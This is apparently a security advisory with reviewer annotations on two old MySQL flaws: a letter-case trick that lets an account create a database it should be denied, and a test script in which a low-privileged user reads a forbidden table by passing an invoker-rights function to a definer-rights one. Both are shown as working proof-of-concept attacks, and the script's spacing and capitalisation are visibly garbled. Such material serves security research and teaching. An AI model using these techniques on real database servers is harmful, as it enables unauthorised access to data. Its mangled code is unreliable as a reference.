MySQL privilege escalation and Security Restriction Bypass Vulnerability
Test method:
[Warning: The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!]
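1. Security restriction bypass: creating a database. In the session below, the account 'sample' is refused when it tries to create an unrelated database, yet it is allowed to create one whose name differs from 'sample' only in letter case.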
$ mysql -h my.mysql.server -u sample -p -A sample
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 263935 to server version: 4.1.16-standard
mysql> create database another;
ERROR 1044: Access denied for user 'sample'@'%' to database 'another'
mysql> create database sAmple;
Query OK, 1 row affected (0.00 sec)
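2. Privilege escalation. The test script below shows that an expression passed as an argument to a routine running with its definer's rights is evaluated with the definer's privileges instead of the caller's.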
# Test script in what appears to be mysqltest syntax: the "--" lines are
# directives for the test runner, and "connect" / "connection" switch sessions.
# Purpose: show that an argument passed to a routine that runs with its
# definer's rights is evaluated with the definer's privileges, so an account
# with no grant on a table can still learn about its contents.
# For defenders: the condition to audit is an untrusted account holding EXECUTE
# on a routine that runs with a more privileged definer's rights. The server
# release that fixes this is not named on this page (<fixed-version placeholder>).
# NOTE(review): spacing and capitalisation in this listing look altered in
# transit (e.g. "@ a: ="), so it is probably not runnable exactly as printed.
-- Disable_warnings
Drop database if exists mysqltest1;
Drop database if exists mysqltest2;
Drop function if exists f_suid;
-- Enable_warnings
# Set up two databases and one low-privileged account; malory@localhost gets
# full rights on mysqltest1 only and nothing on mysqltest2.
Create database mysqltest1;
Create database mysqltest2;
Create user malory @ localhost;
Grant all privileges on mysqltest1. * to malory @ localhost;
# Create a harmless function that is nevertheless "SUID": no SQL SECURITY
# clause is given, so it runs with its definer's rights (MySQL's default is
# DEFINER). The account receives only EXECUTE on it.
# NOTE(review): the grant names test.f_suid, so the session's default database
# is presumably `test` - confirm.
Create function f_suid (I int) returns int return 0;
Grant execute on function test. f_suid to malory @ localhost;
Use mysqltest2;
# Create the table that malory@localhost will be interested in but on which
# he has no privileges at all.
Create table t1 (I int );
# Open a second session named malcon as malory.
# NOTE(review): mysqltest's connect takes (name, host, user, password, db); as
# printed the fourth argument is mysqltest1, so an empty password field may
# have been lost in extraction - confirm against the upstream test.
Connect (malcon, localhost, malory, mysqltest1 );
# Baseline: a direct read of mysqltest2.t1 by malory@localhost must be denied.
# The directive below makes the runner expect that error from the next statement.
-- Error ER_TABLEACCESS_DENIED_ERROR
Select * from mysqltest2.t1;
# Define the probe function with invoker rights. It stores the effective
# account in @a and tries to store the row count of mysqltest2.t1 in @B.
# The delimiter is switched so the body's semicolons do not end the statement.
Delimiter |;
Create function f_edevil ()
Returns int
SQL security invoker
Begin
Set @ a: = current_user ();
Set @ B: = (select count (*) from mysqltest2.t1 );
Return 0;
End |
Delimiter; |
# Second baseline: called directly, f_edevil() runs with the rights of its
# invoker, so the table access inside it is expected to be denied as well.
# The following SELECT shows what was stored in the two variables.
-- Error ER_TABLEACCESS_DENIED_ERROR
Select f_edevil ();
Select @ a, @ B;
# Defect under test: f_edevil() is passed as an argument to test.f_suid() and
# appears to be evaluated in the security context of f_suid()'s definer, so
# malory@localhost obtains the information he has no privilege to read.
# No error directive precedes this call, i.e. the script expects it to succeed.
# NOTE(review): on a fixed server this call should presumably be denied like
# the direct call above - confirm against the vendor's fixed release.
Select test. f_suid (f_edevil ());
Select @ a, @ B;
# Cleanup from the default session.
# NOTE(review): in the lines shown, the malcon session is never disconnected
# and f_suid is not dropped here (only by the "if exists" at the top of a rerun).
Connection default;
Drop user malory @ localhost;
Drop database mysqltest1;
Drop database mysqltest2;